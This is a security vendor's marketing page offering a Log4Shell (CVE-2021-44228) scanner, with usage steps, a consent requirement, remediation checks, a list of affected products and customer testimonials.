The German Federal Office for Information Security (BSI) issued a red alert on Saturday night. Exploiting the log4j vulnerability is as simple as can be. The attacks are already running. Do not waste time and check the security of your systems.
LocateRisk Log4Shell scanner quickly identifies the CVE-2021-44228 vulnerability in accessible web applications. The software is executable under the most common operating systems - so it is also possible to scan systems in the internal network.
Why is the scanner not included in the LocateRisk scan?
From our point of view, the scan cannot be categorized as "non-invasive" because of the increased request load. The scanner puts the JNDI string into various headers, user agent and URL parameters. A system crash is unlikely, but cannot be ruled out.
Important: Only systems for which consent for an invasive scan has been obtained will be checked!
How do I use the Log4Shell scanner?
A line-separated domain / IP list is required as input for the analysis tool. The ports and protocols are automatically added by the software. The system list from the LocateRisk scan provides an initial starting point.
This is how it works
1. Enter domain names and IP addresses to be checked in the "hosts.txt" file in the application directory. IP ranges cannot be stored.
2. Run application.
3. You can find the results on the console and in the results file in the application directory.
Are you interested in the solution? Then send a message to: sales@LocateRisk.com
Note
LocateRisk is not liable for any damages and expenses caused by the scans as well as vulnerabilities not found. It is only a quick check - this means that there is no test tailored to the respective applications. The tool is provided on a transitional basis. We will shut down the corresponding infrastructure again in a few weeks.
Since we cannot guarantee that every Log4J and associated Log4Shell vulnerability will be found, we recommend that you dial into any system running Java apps and follow these 5 steps as well:
Step 1
Open your latest security scan on the LocateRisk platform.
Step 2
Go to the "Details for professionals" list and select the "App" category filter for the report.
Step 3
Search the results using the adjacent search for the JAVA and TOMCAT applications or for the affected applications below.
Step 4
Log in to the corresponding servers. A high CPU load indicates that crypto miners may be installed.
Step 5
Take all JAVA applications (JAR and Tomcat files) you find on the above servers and check them on Github in the following tool
CVE-2021-44228-Scanner or under local-log4j-vuln-scanner.
You will find out immediately if the vulnerability is in the application and you can fix it directly.
You can get more information about the vulnerability and how to fix it directly from the BSI
The LocateRisk team is working hard to include the affected applications in the risk analysis and will update the still incomplete list with each additional case that becomes known.
Most products are applications that use Java in their infrastructure.
Apache Struts2
Apache Tomcat
Apache Spark
Apache Solr
Apache Druid
Apache Nimble
ElasticSearch
flume
Apache Dubbo
Logstash
Kafka
IBM Qradar SIEM
VMWare
NetAppC
Cisco, F5
Citrix
Carbon Black
Imperva
Jenkins
McAfee
Oracle
Webex
Palo Alto Networks
Pulse Secure
A list of applications with the corresponding sources can be found on GitHub
We are glad that we can help many partners and customers with the Log4Shell scanner. The friendly feedbacks and valuable suggestions for the extension confirm us in the action!
"Thank you very much for the good cooperation! Have recommended LocateRisk scanner to my customers. We all benefit from the tool."
"Our systems are already patched. Of course, we'd still be happy to have them send us access to the analysis tool so we can take a closer look at it when we get a chance."
"I've already scanned our infrastructure with various tools, but one more time never hurts 😊"
"Our data protection officer informed me just now that you offer a free analysis tool for the Log4Shell vulnerability. I would very much like to test this and check our internal systems with it."
"We are excited about the software..."
"Good morning. Please send me the analysis tool. Thank you in advance."
"Hello everyone, glad to have this tool 🙂"
"We would love to give your test tool to our prospective customers."
"Great. Thanks a lot for the tool. Have a nice weekend and Merry Christmas;-))"
Identify and reduce your cyber risks through a comparable and understandable overview of your IT security. Let our experts advise you and find out how LocateRisk can help you solve your cyber risks.
English 
Deutsch 
Français